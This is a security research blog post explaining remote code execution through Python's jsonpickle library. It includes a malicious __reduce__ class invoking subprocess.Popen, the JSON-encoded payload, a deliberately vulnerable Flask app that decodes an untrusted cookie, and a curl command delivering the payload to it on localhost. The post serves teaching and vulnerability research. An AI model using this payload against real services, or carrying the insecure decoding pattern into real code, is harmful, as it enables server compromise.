Into the Jar | Jsonpickle Exploitation
Overview
Python’s pickle module is its primary mechanism for the serialization and deserialization of Python object structures. This module has also been the target for exploitation when it used insecurely by loading malicious ‘pickle’ streams and reconstructing objects from them. The dangers are so prevalent in fact that the pickle documentation explicitly states that it is not intended to be secure against erroneous or malicious constructed data.
Interestingly enough, a few libraries have popped up over the years that support encoding pickled objects in different formats such as JSON and XML. In this post we will specifically look at jsonpickle, which has aptly been described as a library for serializing any arbitrary object graph into JSON. We will explore whether or not we can create malicious encoded JSON pickles, use them for exploitation through a vulnerable web application, and some techniques we can use to dynamically trace the libraries functionality when used.
Encoding Pickle Objects
The libraries usage is pretty straight forward. You can simply create a new class instance, and use jsonpickle’s encode()
method to return a JSON encoded pickle. Here is an example from its documentation:
class User(object): def __init__(self, user): self.user = user encoded = jsonpickle.encode((User("rotlogix"))) [*] Test: {"py/object": "__main__.User", "user": "rotlogix"}
This is very nice JSON representation of a pickled object. However, there are a few things we need to understand about how the library seemingly encodes and decodes pickles, and how we can build a properly JSON encoded malicious pickle as well.
Into The Jar
Before we dive into how we are going to construct a valid JSON encoded malicious pickle, lets revisit some key items about the reconstruction process of pickles to Python objects. Included within the pickle architecture is a virtual machine. The PVM contains three important elements:
1. Instruction Engine 2. Stack 3. Memo
The instruction engine is used to process the instructions within the pickle stream, and the stack is a typical stack like structure implemented as a list. The memo is a register scratch space, which is built from an indexed list array. The pickle virtual machine will take a pickle stream and attempt to recreate an object based off of the read instructions. It does this by reconstructing a Python dict from the pickled object, creating a class instance, then populating the class instance from the dictionary elements.
There are 55 supported opcodes for pickle within Python 2, but we will only really focus on the REDUCE
opcode, which is considerably the most useful for gaining code execution.
REDUCE
works by popping two items of the PVM stack; the first item is a tuple that contains arguments, and the second item is a callable. REDUCE
will then execute the callable with the argument tuple and push the resulting object back onto the stack. Lets take a look at this example class and its corresponding shellcode:
class Shell(object): def __reduce__(self): return (subprocess.Popen, (('whoami'),))
p0 (csubprocess Popen p1 c__builtin__ object p2 Ntp3 Rp4 (dp5 S'_child_created' p6 I01 sS'returncode' p7 NsS'stdout' p8 NsS'stdin' p9 NsS'pid' p10 I67142 sS'stderr' p11 NsS'universal_newlines' p12 I00 sb.
Without diving into each instruction, essentially we are pushing the module and callable (Popen
) onto the stack, REDUCE
is used to pop off the arguments and the callable, we call Popen
, then push the result back to the stack. So now that we have a base understanding of what our pickle shellcode will look like, we can used jsonpickle’s encode method to return the JSON representation:
encoded = jsonpickle.encode(Shell()) [*] JSON encoded Pickle: {"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]}
So this definitely makes more sense when having some previous knowledge of what the instructions will look like within the pickle stream. However, we really want to understand what happens after the decoding takes place. We can potentially assume at a high level that jsonpickle takes the JSON format, creates a valid pickle, then reconstructs the object from the pickle.
Tracing
Built into Python’s sys
module is a function called settrace()
. You can use this function by passing it a callback with arguments that define the current stack frame, and a keyword event. It is relatively simple to use this for basic function tracing within a Python program. I will leverage the example code here -> http://pymotw.com/2/sys/tracing.html to trace every time a ‘call’ is made within the application we are using to test jsonpickle. For those who aren’t already familiar with pickle’s vulnerable functions, we really only care about calls being made to loads()
. loads()
will read a pickle object hierarchy from a string, which will de-serialize the pickle stream, and reconstruct our object. As you can imagine, if you pass untrusted data into a the loads()
function, you will wind up with code execution.
def trace(frame, event): if event != 'call': return c_object = frame.f_code func_name = c_object.co_name func_name_line_no = frame.f_lineno func_filename = c_object.co_filename caller = frame.f_back caller_line_no = caller.f_lineno caller_filename = caller.f_code.co_filename print('Call to {0} on line {1} of {2} from line {3} of {4}'.format(func_name, func_name_line_no, func_filename, caller_line_no, caller_filename))
Here are the results after running our program with using settrace()
:
[*] JSON encoded Pickle: {"py/object": "__main__.Shell", "py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": ["whoami"]}, null, null, null]} [*] Reconstructing object from JSON Pickle ... Call to decode on line 134 of /usr/local/lib/python2.7/site-packages/jsonpickle/__init__.py from line 34 of json_pickle_sploit.py Call to decode on line 21 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 148 of /usr/local/lib/python2.7/site-packages/jsonpickle/__init__.py Call to _make_backend on line 29 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 23 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py Call to __init__ on line 84 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 25 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py Call to _make_backend on line 29 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 85 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py Call to reset on line 91 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py from line 89 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py Call to decode on line 175 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py from line 26 of /usr/local/lib/python2.7/site-packages/jsonpickle/unpickler.py Call to _verify on line 50 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py from line 183 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py Call to backend_decode on line 200 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py from line 191 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py Call to loads on line 293 of /usr/local/Cellar/python/2.7.9/Frameworks/Python.framework/Versions/2.7/lib/python2.7/json/__init__.py from line 201 of /usr/local/lib/python2.7/site-packages/jsonpickle/backend.py
Sure enough when we call decode()
on the JSON encoded pickle, the library eventually calls loads()
on the pickle it seemingly reconstructed from JSON.
Exploitation
What would this look like in a real word scenario? Taking a queue from past pickle related vulnerabilities within Python web frameworks, I have built a vulnerable Flask web application that insecurely calls decode()
on a cookie, which can be leveraged for remote code execution. Lets take a look at the code:
@app.route('/') def index(): if request.cookies.get("username"): u = jsonpickle.decode(base64.b64decode(request.cookies.get("username"))) return render_template("index.html", username=u.username) else: w = redirect("/whoami") response = current_app.make_response(w) u = User("Guest") encoded = base64.b64encode(jsonpickle.encode(u)) response.set_cookie("username", value=encoded) return response @app.route('/whoami') def whoami(): user = jsonpickle.decode(base64.b64decode(request.cookies.get("username"))) username = user.username return render_template("whoami.html", username=username)
I’m sure you can already spot the vulnerability! Now we can take our previous JSON encoded malicious pickle, base64 encode it, and deliver it to our vulnerable web application. The Flask application will base64 decode the cookie, call decode()
on the JSON encoded pickle, construct a valid pickle object from the JSON representation, then call loads()
on the pickle stream.
┌[rotlogix@partygoblin] [/dev/ttys005] └[~]> curl -v --cookie "username=eyJweS9vYmplY3QiOiAiX19tYWluX18uU2hlbGwiLCAicHkvcmVkdWNlIjogW3sicHkvdHlwZSI6ICJzdWJwcm9jZXNzLlBvcGVuIn0sIHsicHkvdHVwbGUiOiBbIndob2FtaSJdfSwgbnVsbCwgbnVsbCwgbnVsbF19" http://127.0.0.1:5000/ ┌[rotlogix@partygoblin] [/dev/ttys001] └[~/Development/flask-json-pickle]> python flask-json-pickle.py * Running on http://127.0.0.1:5000/ (Press CTRL+C to quit) * Restarting with stat rotlogix
Wrapping Up
I think it is safe to say that no matter if your are using pickle, or a library that supports the encoding of pickle objects into different formats, that you should always consider the ramifications of loading untrusted data into sensitive functions like decode()
and loads()
. If you would like to experiment with the vulnerable Flask web application and jsonpickle harness, check our repo -> https://github.com/VerSprite/flask-json-pickle
References
http://media.blackhat.com/bh-us-11/Slaviero/BH_US_11_Slaviero_Sour_Pickles_WP.pdf
https://docs.python.org/3.4/library/pickle.html#module-pickle
http://jsonpickle.github.io/#module-jsonpickle
http://pymotw.com/2/sys/tracing.html
http://svn.python.org/projects/python/trunk/Lib/pickletools.py
Protect Your Assets from Various Threat Actors
VerSprite’s Research and Development division (a.k.a VS-Labs) is comprised of individuals who are passionate about diving into the internals of various technologies.
Our clients rely on VerSprite’s unique offerings of zero-day vulnerability research and exploit development to protect their assets from various threat actors.
From advanced technical security training to our research for hire B.O.S.S offering, we help organizations solve their most complex technical challenges. Learn more about Research as a Service →
View our security advisories detailing vulnerabilities found in major products for MacOs, Windows, Android, and iOS.
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /
- /